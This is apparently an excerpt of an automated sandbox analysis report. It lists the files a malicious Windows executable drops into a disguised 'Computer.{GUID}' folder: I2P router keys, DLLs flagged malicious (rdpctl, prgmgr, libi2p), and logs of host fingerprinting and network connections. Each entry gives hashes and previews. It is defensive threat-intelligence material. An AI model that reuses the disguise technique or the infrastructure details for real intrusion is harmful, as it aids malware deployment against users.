SHA-256:	9FD7D70F6871A86FD12CEA9602B17B41DB7CDEB9853D217F75323E69224888FD
SHA-512:	57D441378AD6A67ABB5A159AE2CAEFCACC9BE71DFE9D73774E9BD763218DB6426F2E24DEE2BCAF8BE474FDD93C13F1FCBA163CFC25D55BEF4D4E0DBFCC248395
Malicious:	false
Preview:	+.x.dOF......I......m.m.a.;QB..=.(...u.......4A.e.B.(..R..v:G..V2g..../6>..c...n....x..v`....Ru.?.F....[..To....5j<r....v....f.SW.O.;......z6.-.........d...t{L.%...K......5T._....x............[..8..<........;1....NF..+C.......-l..yh,.B..d(k.K.pr.s..~DL..Y9.D0...)...\|h>..:J.~....i....=......"...).Yr....Vy.t...S.5h.ZOA}`.......=..`....rF5.&..`%0......mR.F.......Id5.;6&.L`..Eik...XAA.l.p...Y.....#S9.H.'h.hnwHm....T_..7a. .[...H?q.7...2._.R>7.;`....3..r.[.F.s7.....\|......j..W.3.QZ.

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p\destinations\jlia4ylyifgh3vywkvkvo5b742o6tqihkfgstsmtnikrkxwwmsma.dat

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	7.617743978840883
Encrypted:	false
SSDEEP:	12:pwcrOG/vAOXjR8GGwsfcsiA6qtrC2qy7OmU5YXA:m5eX9RafcDA6qtO2qGOmUYXA
MD5:	57F84FF5AB9195B0FC19A6FF23561E5E
SHA1:	457DBDC2DA521838BED26BEFEA079CB8FCEA8F37
SHA-256:	F559A1DC56CF8FE5AAE84F9C7FD55FCD0662C18C7C86271C5ACB1D7703B7CE5A
SHA-512:	13ACA223C2A6D68F8EA56F0DB7FB81918CCFBD85A1F36E194939EBB58C6446C648E20AD3131F0AD187C82AE4BAFE53D1CBA397F04DD7EB056DB7BDFD6A3C6B6E
Malicious:	false
Preview:	.E8...gi..0.kA0.n....A...x?.Vc8..b.c.rC...h......+}.eA^.E..N&L".p.nUNm....$.$aT...(.q.Gg.!L... ..[..2l{#..:T`...l......i......;..~.e.t.t...\`.n.#/....>..M1...#.xO..)^{......=.&...4.".~..q>`...(..3..[.O....F/m..].....v....O....M...g......L..+...K......%R..e.<Q6.R.W..{.\...\..Z>..44...N7.....@..Is .............y..1..J.w.e...N&.p....H....N..}O...d.>.....vn.3.#..9.ZY..y...L..Rs....>.n.bEKE.....[U_.w..y#...g(mIm..v..m.t&7&.).Ev.JT......>\|E~.:...t...B......$.,g..\|.....K..%N*..=I=.

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p\destinations\jyqh624tqyvv2j3h3jkbuo4qxdykutwahogynba7trafm6pa6unq.dat

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	7.5801736465304135
Encrypted:	false
SSDEEP:	12:aAgMv5/mVYqLWqrLiq+TyLoDtORcIwSbrLXbHz30BHan:Thx/EJFCFmSOW8rXTzYHa
MD5:	1E73BE8D2185FCB7E949D242CC89C6BE
SHA1:	832A327C59ACAB803BF56DB4C90F601CC9CE8279
SHA-256:	AC9E6CBFE9E23FC4F6A9A423EA194BF3F84777F6252136B45878F70609C8DFA5
SHA-512:	24447753E77D6A9577E7C1F3DEE02567D43A30E94DB1DA7BC9367CAE2AEBF523BA27821F17A51C28F55404B20EB0388B389DFCE1794C4959A8EB1CD8212D1B46
Malicious:	false
Preview:	M....vt'%3.....P%/.tB..,o:1.z3.Y..6g.fx...D.]s.G%.~r..0./.z.....t...p.H.8.....g"n.x..../P....i.N.....z.^"Y.;.En.:..z...}j...-...,.b.6.t..0.M%.A1.i..w.....{..n...;_7....I3<..O.....f2e.L<..s..+c..\..Y.Y."._.M.]5..~Bf.%-.K..C....$.7...(..,......tr...h/.!9...p....x...0..~.K2ry...........G...7......c.q.c8..7c..-D.5t.5.....$..!..=.DW.b\t....:c..../t.69Jg.s.......s..A..."..WF_....AF4O.*.s/.S..d....s..WK.lD......\.E..C?KD.~V.p.J..\|....}.f.V^..v]...I.1}.......A.}.\a<....U.$...!...W4'.E.h..y.

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p\destinations\pkqxdrchmz3vl6shzmgfcapgiciyoigrcxlc52huqpj5r6espzfq.dat

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	7.5749567823447554
Encrypted:	false
SSDEEP:	12:Vo2pssEgeawWhybhr6qaJruasXmcYmkQ01:VtssEgJxytUf7XQ01
MD5:	6C7EB2197A85920F1FE4FF3832F2ACDB
SHA1:	90E1F49A73E8A234465431386982648DE7F77480
SHA-256:	A6A7F1C83C390624A617DE84CE796A3E0279247638A2BCC84B7548A6F61BDC51
SHA-512:	9FBB71582487013071E0751A0B71B5AAA087ECB632FA7B0741E5377E8AFE4AA044C5C119E30DACF686B56FB11992129E87A77C08714C58BCC24EE198752EFA0D
Malicious:	false
Preview:	..U..Ia.q...c.A5.W..8.......'..oQ.....Q....y.]..rZd..<..D.g.+E-...!..D..<.}./.:.U....G...!v....AR.cv.sj..%a.......0.....'.T=.^E...A..!.c..U.V.../.K..B.r.....&i0..<"?."........3.K...8..%.%..O..b...+....ou5.Tf...L.....u.iZ..A....4./....q....O..<...>..E...Y.......Uv...B.....\|.Yu..u.[.1.u....Cz....C`.H.".[.W..+u.1.9..>?bC....#..tn.q.3.I...#p...,......u.x>...g..K.i...h.C.W...O.\|$..m?...).gA......~...3D..YIT..u.....s^X..,....^.\|.....}.).2tx....@...5.7m..kI.E.=........[LkH...-.Z".A.\|.A....

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p\destinations\uiabqix22ly6gsusvaczaqn4xie376bi7tnfri43pyt6efyd6gla.dat

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	7.637860378079807
Encrypted:	false
SSDEEP:	12:ms6hSNHVo0aA542LaUkb1B0+yDF5SFNA3A0BqvSkjn:b4SNHrl+Ukb1B0+CSFN2L0akj
MD5:	11D3C9F25634D36948B484E22BF17ED0
SHA1:	B7E5AD65689ACADC4AD771ED058BE1F14B6C8689
SHA-256:	8895DBDE36EE8F89E0D4FDE4B78F0204054DB3077D8799B1CCB93AE22D0629F1
SHA-512:	A41AC5096926AB82CEBD9C3AD754B9D7BEDF87C5D7513234B0A017E30AEEB1F7EE82922A8269C84E1F5B818966922BCB926B30CE66B2323838A561405A669779
Malicious:	false
Preview:	-PI..{Y/G.k...i.S.;.6.@..M.<a.1...].26q`Pe..}...'=8.....5V..SLwv.`.Dwk...b..I....;...j..E....H..v..Fj.S....p..5..PS..h.j...&..q.p...C.....}_s...y2V......r$..G.K..BK..............&.....[....&\.b?..X..&..>.........\|.af+P..B{9..l..,.........D.N...Q...M...Q.[..`Q\i..........5Y.X..4....."+Q."..It.cX.9..k.).L`TS}...A.9..\|r.V....^o....0ae.p..=c..:...p..y7..su......p......,2J.}I.9. ue..."....Q.&..j...t.Z..2..A.7.n./..jG.Bz7o....'.....Cr7+....<y..qjn.......(C<#.7W..}.....^.^OA...Q..."<.S"A

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p\destinations\zacnsydbklovgnjviii3p6zokzhmfzirc67yzgvbhmvmpoin2rjq.dat

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	7.642750013751718
Encrypted:	false
SSDEEP:	12:O9gCVi/UjPwj6tHTG8b2emzV29SjfeKJLhoGaC+Am:OW/Ujo6C1kStBCGaCLm
MD5:	CC81D7BB48338F106F06CFADACE045FB
SHA1:	344591D69D681D33BA7BB08A2B38BD33466D5939
SHA-256:	5737DB89BA782CA07B801C1CAE274B3E0074E5E26E6C7D27759FD8879E0A352E
SHA-512:	264B1C9C209227EBE64D64DB8121705018D7F221E8449F8DA8563468023E308C5F126578FCACEA0AEDA5039A3C208C6A78295339F67E050665B9820EA227AA89
Malicious:	false
Preview:	?{T...Y..<q...1..t..;[#..Y. .[.7!l...0A6.?.K.......6Ef4.....R.S,^...6.O.. P(.w..TCH.%..]....5$..k...I..(,>.B...+.....x.....'...>....B@y.'.#5....p...._......W8N...m/...^m.guL.'.z.b....U.[.....Zi.2...... K..C.\..h.....X...I.;.0..K...n....c$...F b...)..A'.4..t0..o..DN3aJ.:4..,3eg.2."t..1.u...D.?Z1.......X.a..V.!q..C.{....ra.Z..^...(.~n...9...w..\^.;.2..=Kj.v.$s.....,<.t....2.V.2LY..q.f...VB.g..2x....G@:....=....F...0.p.X...l...........U[..t...w4&.]}....2O..l..g..t]...,42p.6o1&....[F.3

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p\ntcp2.keys

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	data
Category:	dropped
Size (bytes):	80
Entropy (8bit):	6.021928094887359
Encrypted:	false
SSDEEP:	3:o8ixZKCT82m5jWW9vhB4VLZ+Xyqj9lHuWQin:o8OKCwJ86vIt+XyquW5n
MD5:	A5540A0445E31EC22002F4CE8F569506
SHA1:	8C1A86F743969B8C2BF67FE851C2D601D6D9DF89
SHA-256:	9E10AC32A6060AA6EC2959934564811335AE139F14B7C577A405E92BA6FE371C
SHA-512:	125369E01BB0909772A20D7479403DAC29DBEC4F54087A4064735557D55C21CE0F7FDC511E4DCB4BEA32DA5DDBB51AB00033B02BAEB3BF307618590AC082D14F
Malicious:	false
Preview:	.c:..........r@(I.o.{..Q.Q.I.u.>O..ZF%..s...lv..p...ov^..O.X..p....ySm+.&.

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p\router.info

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	data
Category:	dropped
Size (bytes):	806
Entropy (8bit):	6.586388417930768
Encrypted:	false
SSDEEP:	12:194DysssssssssMuUg3Ox61vOQ1vuqFahEh3hCaYJJ4dmlM:jDH43vLCYdYJJsWM
MD5:	2B28886F20DD3D2EF97DD5E1762EFBA4
SHA1:	651CE032741BBB05E60B3226AEA38DD969CFC124
SHA-256:	5E92566A83EA29FEFCFC94D6AF79B7D54D8DBEF8ABEAB8C04A9C935399844660
SHA-512:	DF8118BC9D92C95381618CEA6ED7A50458B19CF017A454B80A0F65A426C7259A0420D7F5493372E445E4B5484E4ED3964D6F885045A234B3E81951F980820EE5
Malicious:	false
Preview:	.6.".er...gSB.d.}....r.4...9..m..0(..2.`.k...%j.H^..=4(s.@..%...0(..2.`.k...%j.H^..=4(s.@..%...0(..2.`.k...%j.H^..=4(s.@..%...0(..2.`.k...%j.H^..=4(s.@..%...0(..2.`.k...%j.H^..=4(s.@..%...0(..2.`.k...%j.H^..=4(s.@..%...0(..2.`.k...%j.H^..=4(s.@..%...0(..2.`.k...%j.H^..=4(s.@..%...0(..2.`.k...%j.H^..=4(s.@..%...0(..2.`.k...%j.H^..=4(s.@..%.F.W..........=0v...?.B.z.....'z..........."..............NTCP2.t.host=.8.46.123.189;.i=.xlgAj3Cty~rneVNtK~UmGw==;.port=.9525;.s=,4mM6lQChHviBGIeU65pyQChJnG~nexHimVGBURZJvXU=;.v=.2;..........SSU2...caps=.BC;.host=.8.46.123.189;.i=,UNNzGMZaPwjaHkwEruy-FkU39QBbA~Oa54SlfFplwgg=;.port=.9525;.s=,ELTGucBK09kSm-yCGpBBtcppfp5BXFM1aSd1mv9cXUM=;.v=.2;..,.caps=.LR;.netId=.2;.router.version=.0.9.60;..=....&I_.>....V.i..S...j%f.69.z....Nj....[.......5......X.

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p\router.keys

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	data
Category:	dropped
Size (bytes):	455
Entropy (8bit):	5.938059893715906
Encrypted:	false
SSDEEP:	6:SS9gpDO9tMg7Q9tMg7Q9tMg7Q9tMg7Q9tMg7Q9tMg7Q9tMg7Q9tMg7Q9tMg7Q9t/:194DysssssssssgK7amkQ
MD5:	9E7FFD98C33DBFBE7F101D38B948E8B5
SHA1:	056D61E44947379EC9D014333A0882076E499B7D
SHA-256:	21438B184E2DD363CF5819DC30E0AB4ED8F97BCF096B330DF6D16DA003833852
SHA-512:	FD161EA462B076989620E97807FCC4FCB302FBE920056950032B8CBB2FEC10E8BE8EB2F3CF77527763C663CECCFD75E08F3DE51CCB6DDCD32EFC4238C2ED44C0
Malicious:	false
Preview:	.6.".er...gSB.d.}....r.4...9..m..0(..2.`.k...%j.H^..=4(s.@..%...0(..2.`.k...%j.H^..=4(s.@..%...0(..2.`.k...%j.H^..=4(s.@..%...0(..2.`.k...%j.H^..=4(s.@..%...0(..2.`.k...%j.H^..=4(s.@..%...0(..2.`.k...%j.H^..=4(s.@..%...0(..2.`.k...%j.H^..=4(s.@..%...0(..2.`.k...%j.H^..=4(s.@..%...0(..2.`.k...%j.H^..=4(s.@..%...0(..2.`.k...%j.H^..=4(s.@..%.F.W..........=0v...?.B.z.....'z........U.Fm5..xz.o...d......^Jy...Y.W.R.......nMc.T24A.._uV...1 ....3

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p\ssu2.keys

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	data
Category:	dropped
Size (bytes):	96
Entropy (8bit):	6.298402344426088
Encrypted:	false
SSDEEP:	3:0bWwkoZ25XzZt048o1c8WJmzBhKem:0Kwkb5jZt0481HJGnNm
MD5:	AF578151B71A9ABEFD9A3E931D2ED43E
SHA1:	4D2B3DCCCDA2A24FA6D97BC41A4AAA88474447F9
SHA-256:	C5A0E9EADB8035D3F6ABB6A261331DFA68F4BF0DA0B74A0147F408170F217DA7
SHA-512:	E5ED9DB125C9C98B5B85C7478C85394F8ABE22C52F47DC51D675C8894F4C04AE62CC220E579BD8050A6EF7D701DA6165E33ABB150A479527C09D49CBB9147A16
Malicious:	false
Preview:	....J.......A..i~.A\S5i'u..\]C...8..+.g......4._...>....-2.v.aP.s..Z?...L....E7..[...\|Ze..

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\libi2p.dll

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	9146880
Entropy (8bit):	6.674868432808522
Encrypted:	false
SSDEEP:	196608:DiRu5DnWLX6Cs3E1CPwDvt3uF8c339CME:DiRsCKCsU1CPwDvt3uFd9CME
MD5:	676064A5CC4729E609539F9C9BD9D427
SHA1:	F77BA3D5B6610B345BFD4388956C853B99C9EB60
SHA-256:	77D203E985A0BC72B7A92618487389B3A731176FDFC947B1D2EAD92C8C0E766B
SHA-512:	4C876E9C1474E321C94EA81058B503D695F2B5C9DCA9182C515F1AE6DE065099832FD0337D011476C553958808C7D6F748566734DEEE6AF1E74B45A690181D02
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......f..........."...).t]......R..0........................................P............`... .......................................z..t... ...,............p..?...........p...............................`m.(....................*...............................text...(r]......t].................`..`.data.........]......x].............@....rdata..`>...@^..@....^.............@..@.pdata...?....p..@...^p.............@..@.xdata...t....t..v....t.............@..@.bss....`Q...@z..........................edata...t....z..v....z.............@..@.idata...,... ......................@....CRT....`....P......................@....tls.........`......................@....reloc.......p......................@..B........................................................................................................................................................................

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\nju2apmx83wqd9u7namsf59y.exe
File Type:	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	89088
Entropy (8bit):	6.205377670389132
Encrypted:	false
SSDEEP:	768:y5rUJUohYhdi9PbahfxaxQo9uYN/kpYBbMQGwryimzgvmak7EoKk1dhJJY9V/Sbf:digoZax39NN/DBgQVmzg5kF/ctIN
MD5:	BB070CFBD23A7BC6F2A0F8F6D167D207
SHA1:	BDB8961F8AFB999AECE60BF1EF3E49E8E2349F7B
SHA-256:	C0860366021B6F6C624986B37B2B63D460DD78F657FC504E06F9B7ABBFDC2565
SHA-512:	93D052675636FBE98204EF8521B9F10F8A0CBCAC40E8835AD8249DAFD833C29B7F915A898671B21064D4ED6D04DA556D9D3647D03EB93232ADB2ACD2D7DC1F8A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 70%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......................*.....X.................@....................................-.....`... .................................................P............`..X............................................B..(....................................................text...X...........................`..`.data...............................@....rdata...Q.......R..................@..@.pdata..X....`.......0..............@..@.xdata.......p.......:..............@..@.bss....P................................idata..P............D..............@....CRT....`............V..............@....tls.................X..............@....reloc...............Z..............@..B................................................................................................................................................................................................................

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.log

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4672
Entropy (8bit):	5.3365987054488295
Encrypted:	false
SSDEEP:	96:idHwWYJ9VFlyHzHH0H20HaSHfmHu5SHSPmHSm5SHWmHOn5SHHSHBGPQmHX5SHKnh:AziTGTn0W06SeO5SPz5SJc5SnSw35Sqh
MD5:	E033FD827FB8C3462BC57CEE0B41DC7A
SHA1:	B8C7AF6A38D095AEFB1B267516F6ACEA64C8C407
SHA-256:	9CD791F92ABAB986ECFCFB5F5D32CD48580180DE27EB5AF31AE20745D01A1706
SHA-512:	909292CBE1F0CD0BF2584FAB9CF6D9B1A7A3E64E3A07E7FA5D544C212FC7B7174254638B626063130CACD4196B962DA163660DA57DCE345D8B2CC675FEA6C3CE
Malicious:	false
Preview:	[I] (debug_init) -> Log open success(flog_path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.log)..[I] (debug_init) -> Done..[I] (module_load) -> Done(name=ntdll.dll,ret=0x00007ffe22170000)..[D] (module_get_proc) -> Done(hnd=0x00007ffe22170000,name=RtlGetVersion,ret=0x00007ffe221ae520)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_win_dir=C:\Windows)..[D] (registry_get_value) -> Done(root=0xffffffff80000002,key=SOFTWARE\Microsoft\Cryptography,param=MachineGuid)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_mach_guid=9e146be9-c76a-4720-bcdb-53011b87bd06)..[I] (sys_init) -> GetVolumeInformationA done(vol=C:\,vol_sn=0aeba93c)..[I] (sys_init) -> Done(sys_uid=c76a8f080aeba93c,sys_os_ver=10.0.19045.0.0)..[E] (package_install) -> Failed(pkg_path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\,tgt_path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\,err=00000003)..[I] (fs_file_read) -> Done(path=C:\Users\Public\Computer.{20d04fe0-3

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\npX5adYEH7eu.acl

Download File

Process:	C:\Users\user\AppData\Local\Temp\nju2apmx83wqd9u7namsf59y.exe
File Type:	data
Category:	dropped
Size (bytes):	456
Entropy (8bit):	3.2341395630162877
Encrypted:	false
SSDEEP:	12:Ml8Pi7t8+d/fQfjfEWNfElsfghFfShFfgmSem4emzYWr:k8APd/oj8i8ls0FSFgID7r
MD5:	40AB00517F4227F2C3C334F1D16B65B4
SHA1:	F8D57AF017E2209B4FB24122647FD7F71B67C87C
SHA-256:	4BAF4B78D05A28AF7DEE7DBBCE2B4EDF6053D9239C1756C932BE9F2FEEE4EF85
SHA-512:	75D74306F043B864295F09A60C19A43494C226664733C99318989CE5C22CB9395BB407FB5C8C0268AD9184A79813304ED5FC943A6B53DB54F5F225CDA31650E3
Malicious:	false
Preview:	C.o.m.p.u.t.e.r...{.2.0.d.0.4.f.e.0.-.3.a.e.a.-.1.0.6.9.-.a.2.d.8.-.0.8.0.0.2.b.3.0.3.0.9.d.}.....D.:.A.I.(.D.;.;.F.A.;.;.;.B.U.).(.A.;.;.F.A.;.;.;.B.A.).(.A.;.O.I.C.I.I.D.;.F.A.;.;.;.B.A.).(.A.;.I.D.;.F.A.;.;.;.S.Y.).(.A.;.O.I.C.I.I.O.I.D.;.F.A.;.;.;.C.O.).(.A.;.O.I.C.I.I.O.I.D.;.F.A.;.;.;.S.Y.).(.A.;.O.I.C.I.I.D.;.0.x.1.3.0.1.f.f.;.;.;.I.U.).(.A.;.O.I.C.I.I.D.;.0.x.1.3.0.1.f.f.;.;.;.S.U.).(.A.;.O.I.C.I.I.D.;.0.x.1.3.0.1.f.f.;.;.;.S.-.1.-.5.-.3.).....

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\prgmgr.dll

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	105984
Entropy (8bit):	6.285421743969757
Encrypted:	false
SSDEEP:	1536:BQrD6CCk73WUJ/2WEvooF8VohjBdmaKqYdpFXaRQSCYA8CSs8qgu06wCYA8CSs8V:BA6sDl/2WEvo0DipFXaRQO
MD5:	6E01ED70D02CE47F4D27762A9E949DEE
SHA1:	32B9199EBBD7891CF0091B96BF3B2C9303AB7B7A
SHA-256:	EFB9B3D4356071EE8FE66979140E7435371EC668088A68786C6FDCEDF29D7376
SHA-512:	B21C8F79553EE513F6C48EFA618C20FB82CBC77EDE95579C28C21D8BB433B93D108CEF442B48ECBDABD0B06AA5C8AEDC8B26316167D1793A0E972B38D4210854
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...*............Y........................................@............`... .........................................^.......................T............0..h...............................(.......................`............................text...............................`..`.data........ ......................@....rdata..Pc...0...d..................@..@.pdata..T............n..............@..@.xdata...............x..............@..@.bss.... ................................edata..^...........................@..@.idata..............................@....CRT....X...........................@....tls......... ......................@....reloc..h....0......................@..B........................................................................................................................................................................

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\prgmgr.log

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1167
Entropy (8bit):	5.489100198407122
Encrypted:	false
SSDEEP:	24:CFAGHr5lGyclY7Gfy6BgT7cRE9FLxJbJ/l0ERgSXYlHeAOp:CFdHr54yclDYcm9FLnFlfgeD
MD5:	B9918236739FB053EC9A0A8837A1A485
SHA1:	83CE86869DA779321F9FD904555E9E8F875A2308
SHA-256:	3A29AD8A232375641F28913D18AA8D5F2E132EA5FB4AE9BF05C28B5440797B69
SHA-512:	58FD589D739A6A99CB7C4C6B00E3169145BC8E606B010244B85A1C1D205DC4A47FBE7101EA6D4EF8BA54949B03A8B3DA66A1C6CE6D4A4E88F940398ECA9C0197
Malicious:	false
Preview:	[I] (debug_init) -> Log open success(flog_path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\prgmgr.log)..[I] (debug_init) -> Done..[D] (ini_get_sec) -> Done(name=main)..[D] (ini_get_var) -> Done(sec=main,name=version,value=400004957b19a09d)..[I] (module_load) -> Done(name=ntdll.dll,ret=0x00007ffe22170000)..[D] (module_get_proc) -> Done(hnd=0x00007ffe22170000,name=RtlGetVersion,ret=0x00007ffe221ae520)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_win_dir=C:\Windows)..[D] (registry_get_value) -> Done(root=0xffffffff80000002,key=SOFTWARE\Microsoft\Cryptography,param=MachineGuid)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_mach_guid=9e146be9-c76a-4720-bcdb-53011b87bd06)..[I] (sys_init) -> GetVolumeInformationA done(vol=C:\,vol_sn=0aeba93c)..[I] (sys_init) -> Done(sys_uid=c76a8f080aeba93c,sys_os_ver=10.0.19045.0.0)..[I] (net_init) -> Done..[I] (ebus_init) -> Done..[I] (ebus_subscribe) -> Done(handler=0x00007ffe11eca8a0)..[I] (tcp_connect) -> Done(sock=0x3bc,host=7

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rdpctl.dll

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	129536
Entropy (8bit):	6.2852879161990645
Encrypted:	false
SSDEEP:	1536:UmeFYyUJdEqzx2LVJ4ngXsNXGRqnbxeGqS/h0E0P3j4NBtRLBhBr:UZUJdhxCJ4ngg46weh0dr4vnV
MD5:	88E6178B0CD434C8D14710355E78E691
SHA1:	F541979CAD7EE7C6D8F2B87A0F240592A5DC1B82
SHA-256:	7B40349481AD6C522A23FB3D12D6058EC0A7C5B387348FB4AE85135EE19C91A4
SHA-512:	C4330A9EE1E69785420AABCFD1991AAAEB0F1764EB7E857F0C86161F61E1FFD467B458A2D458D3C55BB76D00F26FAC481D026443AB0796D0AEF38BF06CD84B8F
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."....<..........Y.........,...................................../....`... ...................................... ..^....0..D............................p..l...............................(...................p5...............................text....:.......<..................`..`.data........P.......@..............@....rdata.......`.......B..............@..@.pdata..............................@..@.xdata..............................@..@.bss.....................................edata..^.... ......................@..@.idata..D....0......................@....CRT....X....P......................@....tls.........`......................@....reloc..l....p......................@..B........................................................................................................................................................................

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rdpctl.log

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1354
Entropy (8bit):	5.489815779472015
Encrypted:	false
SSDEEP:	24:CFAGH75lGyclY7Gfy6BgT7cRE9FLxJbJ/l0dk1RDo0XLYcRAENmMeAOp:CFdH754yclDYcm9FLnFlD0cLMMeD
MD5:	20A4271E5AA146ECCAD1C6B2BCDC44A7
SHA1:	5FB785A4A7D743477C9BFA32A1CC5C9B41EAFAC5
SHA-256:	17AFA31FBE11C1DCE8275CF167502652211F2A94DB6C6DC0B8002D9DB856CE78
SHA-512:	67A7DB785D1E9B06F92025696437387CBFC446C38E36D195328ADB8AE227C7071522941033321FC580E39F644E379ABA0B5D6DFDE24A713E67D24EA264F7E850
Malicious:	false
Preview:	[I] (debug_init) -> Log open success(flog_path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rdpctl.log)..[I] (debug_init) -> Done..[D] (ini_get_sec) -> Done(name=main)..[D] (ini_get_var) -> Done(sec=main,name=version,value=400004957b19a09d)..[I] (module_load) -> Done(name=ntdll.dll,ret=0x00007ffe22170000)..[D] (module_get_proc) -> Done(hnd=0x00007ffe22170000,name=RtlGetVersion,ret=0x00007ffe221ae520)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_win_dir=C:\Windows)..[D] (registry_get_value) -> Done(root=0xffffffff80000002,key=SOFTWARE\Microsoft\Cryptography,param=MachineGuid)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_mach_guid=9e146be9-c76a-4720-bcdb-53011b87bd06)..[I] (sys_init) -> GetVolumeInformationA done(vol=C:\,vol_sn=0aeba93c)..[I] (sys_init) -> Done(sys_uid=c76a8f080aeba93c,sys_os_ver=10.0.19045.0.0)..[I] (scm_init) -> Done..[I] (net_init) -> Done..[I] (ebus_init) -> Done..[I] (proxy_init) -> Done..[I] (ebus_subscribe) -> Done(handler=0x00007ffe11be

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\referrer

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	4
Entropy (8bit):	2.0
Encrypted:	false
SSDEEP:	3:9:9
MD5:	006F29D8E822B9241020AEC2495EF819
SHA1:	6510BEB08A14B6BCC74D32031C1B19AA07169CF1
SHA-256:	69FF245F90727BBEFA5B1F82E2429FF74F31A6A5385B5129A2FE3378DCF200F1
SHA-512:	16916BC4477F6FC1AE1132D2F5D2B9587650DC44E23DE15E0FE787AFE23175E0E236C020C753BA5158F688BEACDA523AAFB7EC1DF82B6F7619573C90A48742E8
Malicious:	false
Preview:	wgNj

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rfxvmt.dll

Download File

